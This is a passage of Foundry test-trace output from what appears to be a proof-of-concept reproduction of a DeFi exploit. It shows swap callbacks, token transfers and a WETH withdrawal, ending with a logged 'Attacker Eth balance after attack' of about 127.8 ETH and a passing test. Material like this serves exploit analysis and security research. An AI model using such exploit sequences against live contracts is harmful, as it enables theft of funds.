    │   │   ├─ [2529] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::balanceOf(0x840DEEef2f115Cf50DA625F7368C24af6fE74410) [delegatecall]
    │   │   │   └─ ← [Return] 338902200232840689492 [3.389e20]
    │   │   └─ ← [Return] 338902200232840689492 [3.389e20]
    │   ├─ [10003] ASTTest::uniswapV3SwapCallback(20000407064566313222 [2e19], -21020645622463912471 [-2.102e19], 0x)
    │   │   ├─ [266] 0x840DEEef2f115Cf50DA625F7368C24af6fE74410::token0() [staticcall]
    │   │   │   └─ ← [Return] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704
    │   │   ├─ [7483] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::transfer(0x840DEEef2f115Cf50DA625F7368C24af6fE74410, 20000407064566313222 [2e19])
    │   │   │   ├─ [6783] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::transfer(0x840DEEef2f115Cf50DA625F7368C24af6fE74410, 20000407064566313222 [2e19]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x840DEEef2f115Cf50DA625F7368C24af6fE74410, value: 20000407064566313222 [2e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4a6546822cb6f658b6190c162580ab1437ed4daf8b47da4496c410e57272f7c9: 0x0000000000000000000000000000000000000000000000125f367b87ecc67754 → 0x00000000000000000000000000000000000000000000001374c633ca1b76a85a
    │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000001158fb8422eb03106 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [1226] 0xBe9895146f7AF43049ca1c1AE358B0541Ea49704::balanceOf(0x840DEEef2f115Cf50DA625F7368C24af6fE74410) [staticcall]
    │   │   ├─ [529] 0x31724cA0C982A31fbb5C57f4217AB585271fc9a5::balanceOf(0x840DEEef2f115Cf50DA625F7368C24af6fE74410) [delegatecall]
    │   │   │   └─ ← [Return] 358902607297407002714 [3.589e20]
    │   │   └─ ← [Return] 358902607297407002714 [3.589e20]
    │   ├─ emit Swap(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 20000407064566313222 [2e19], param3: -21020645622463912471 [-2.102e19], param4: 81235932401799437579572453096 [8.123e28], param5: 102040759646533565564582 [1.02e23], param6: 500)
    │   ├─  storage changes:
    │   │   @ 1: 0x0000000000000000000000000000000003bab810b7f264a8086db7180ff958fd → 0x0000000000000000000000000000000003bab9b5a256de3386ca448b49a915fc
    │   │   @ 0: 0x00010000b400b400430001f80000000000000001068a49f571f0ddc9de9a7ca0 → 0x00010000b400b400440001f40000000000000001067cc9cfb221b16e1ba79ee8
    │   │   @ 76: 0x0100065bcd000000000001bae9e6068f0ba9349e40000000c1790c1565380d9f → 0x0100065bcd000000000001bb4f0ee9e4d873b53af0000000cb0ec4d5653ce553
    │   └─ ← [Return] 0x000000000000000000000000000000000000000000000001158fb8422eb03106fffffffffffffffffffffffffffffffffffffffffffffffedc47aa2db3ab25e9
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 63638748240147758427 [6.363e19]
    ├─ [9195] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::withdraw(63638748240147758427 [6.363e19])
    │   ├─ [55] ASTTest::receive{value: 63638748240147758427}()
    │   │   └─ ← [Stop]
    │   ├─ emit Withdrawal(src: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 63638748240147758427 [6.363e19])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000003732a405a1485bd5b → 0
    │   └─ ← [Stop]
    ├─ emit log_named_decimal_uint(key: "Attacker Eth balance after attack:", val: 127797499079942863578 [1.277e20], decimals: 18)
    ├─  storage changes:
    │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 301: 2 → 1
    │   @ 0x9b17c11b8c736fed301c5954963356224d33dfeb95b10804f1c9fd4fcdc3f6e9: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   @ 0x3b9b5d149284f029f0dd6eb4d3b305e8eb963f578fb281459f4c0adb6394143e: 0 → 0x000000000000000000000000000000000000000000000001158fb8422eb03106
    │   @ 0: 0 → 0x00010000960096001400035100000000000000010b1b3eced8ab772b591d1a68
    │   @ 0x29084008e96b161a41a18c1e36380bcd328a9e87c876663012548487b28164a1: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   @ 0x0000000000000000000000000000000000000000000000000000000000ffffff: 1 → 0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 36.46s (35.11s CPU time)

Ran 2 test suites in 37.91s (36.94s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
